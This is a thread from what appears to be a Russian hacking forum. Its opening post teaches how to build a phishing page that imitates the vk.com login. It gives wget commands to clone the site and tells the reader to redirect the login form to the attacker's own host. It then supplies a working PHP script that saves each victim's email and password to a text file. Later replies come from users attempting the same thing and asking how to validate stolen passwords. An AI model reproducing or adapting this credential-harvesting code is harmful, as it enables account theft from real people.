Хакерский софт, программирование и различные услуги

Вернуться   Хакерский софт, программирование и различные услуги > В сети > Взлом и Софт

Взлом и Софт Обсуждение методик взлома ICQ, E-mail, Dedicated Servers, сайтов и прочего. Уязвимости. Актуальный софт для взлома. Brute.


Ответ
 
Опции темы Опции просмотра
 
Старый 26.04.2012, 17:20   #1
Paukan
Залётный
 
Регистрация: 26.04.2012
Сообщений: 2
Paukan на пути к лучшему
По умолчанию Создание простой фейковой страницы (scam) с записью данных в файл

Фейковые страницы, они же scam'ы, создаются с целью ввести жертву в заблуждение, чтобы та сама ввела свой логин и пароль на чужом сайте.

Фейковые страницы бывают разные по сложности, но если она не похожа на оригинал, то затея заранее бессмысленна. Поэтому даже самый простейший scam не должен отличаться от оригинала.

Проще всего создать полную копию страницы можно с помощью программы wget. Данная программа есть по умолчанию практически во всех linux дистрибутивах (возможно в mac тоже), но вот в windows её нет. Но её порт можно скачать здесь.

Порт для windows весьма корявый, но работает. После установки следует перейти к exe файлу в командной строке (например: cd C:\Programm Files\GnuWin32\bin), а уже потом можно работать с wget, как и в linux.

В качестве примера рассмотрим создание фишинговой страницы vk.com. Если нужно скопировать всего одну страницу, то следует ввести команду:

Код:
wget –k vk.com
В тоже место откуда была запущена команда скопируется файл index.html. Если нужно скопировать в его определённое место, то для этого есть ключ «–O». Пример на скриншоте (кодировка глючит из-за корявого порта).



Очень важный ключ «-k». Он позволяет не просто получить html вариант страницы, но и преобразовать все ссылки так, чтобы прогружались стили и картинки.
Если есть желание, чтобы все основные стили, картинки и библиотеки грузились именно с вашего хостинга, то можно включить рекурсивную загрузку с глубиной в 1 шаг:

Код:
wget -r -l1 -k vk.com
А можно и вовсе стащить целый сайт:

Код:
wget -mk vk.com
Программа имеет колоссальное количество возможностей и очень проста в использовании. Более подробную информацию о ней можно получить, введя команду wget –h. Если глючит кодировка, то можно посмотреть здесь.

Когда страница/сайт скачен, то можно приступать к редактированию, чтобы логин и пароль записывались в файл.

В index.html будут примерно такие строки (проще всего искать по запросу login)



Нужно заменить адрес, куда уходят данные об авторизации на наш. Значит, меняем https://login.vk.com/?act=login на http://ваш_хостинг/login.php.

Теперь нужно создать сам файл login.php
Для vk.com идеально подходит такой вариант:

Код:
<? 
$Login = $_POST['email']; 
$Password = $_POST['pass'];            

$filename = "base.txt"; 
$file = fopen($filename, "a+" ); 
 fputs ($file, 'login_name: '.$Login."\n"); 
 fputs ($file, 'login_password: '.$Password."\n");  
 fputs ($file, '------------------'."\n");                       
fclose($file); 
?>
Если нужно создать фейковую страницу для другого сайта, то первых две переменных придётся слегка заменить. В данном случае 'email' и 'pass' получили отсюда:



Просто нужно посмотреть значение 'name=' и подставить их в файл login.php

Остаётся только создать файл base.txt и дать права на запись (Обязательно!! Почему-то про это часто забывают).

Простейшая фейковая страница готова. Она ничуть не отличается по дизайну, зато отлично запоминает данные, которые на ней вводят.



Позже будут рассмотрены более сложные примеры фейковых страниц. Например, чтобы данные проверялись на валидность, была возможность отправлять результаты на почту и тому подобное. Но описание того, как скачать полную копию страницы, будет только в этой статье.
Изображения
Тип файла: png windows.png (31.3 Кб, 445 просмотров)
Тип файла: jpg login.jpg (9.3 Кб, 419 просмотров)
Тип файла: jpg email.jpg (14.5 Кб, 422 просмотров)
Тип файла: jpg profit.jpg (49.5 Кб, 426 просмотров)
Вложения
Тип файла: txt help.txt (12.9 Кб, 210 просмотров)
Paukan вне форума   Ответить с цитированием
Реклама на форуме. Расценки на рекламу. Реклама на форуме хакеров. Расценки на рекламу.
Старый 12.07.2014, 19:19   #2
interestingyy
Новичок
 
Регистрация: 08.07.2014
Сообщений: 24
interestingyy на пути к лучшему
По умолчанию

Делаю я по инструкции. Хочу сделать фейк VK.COM
ввожу wget –k vk.com - но копируется домен m.vk.com и сохраняеться в соотвт папке.

А как сделать копирование именно домена VK.COM и всего, что там понапичкано))





вау.. ух ты.. большое спасибо вам! а вы не поможете мне разобраться вот с этой темой? я вижу, вы классно разбираетесь.. _http://forum.softxaker.ru/showthread.php?t=5865&page=2

Последний раз редактировалось interestingyy; 12.07.2014 в 23:27.
interestingyy вне форума   Ответить с цитированием
Старый 06.07.2016, 15:19   #3
Danon
Залётный
 
Регистрация: 17.06.2016
Сообщений: 7
Danon на пути к лучшему
По умолчанию

Жаль тема заглохна
А то очень хотелось бы узнать как сделать, чтобы проверялась валидность логин/пасс
Danon вне форума   Ответить с цитированием
Старый 22.08.2016, 21:21   #4
robotbyn
Залётный
 
Аватар для robotbyn
 
Регистрация: 19.08.2016
Сообщений: 4
robotbyn на пути к лучшему
По умолчанию

интересно
robotbyn вне форума   Ответить с цитированием
Ответ


Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Текущее время: 12:18. Часовой пояс GMT +3.

Powered by SoftXaker® Version 3.5.1
Copyright ©2000 - 2017, Форум хакеров и программистов: Forum.SoftXaker.ru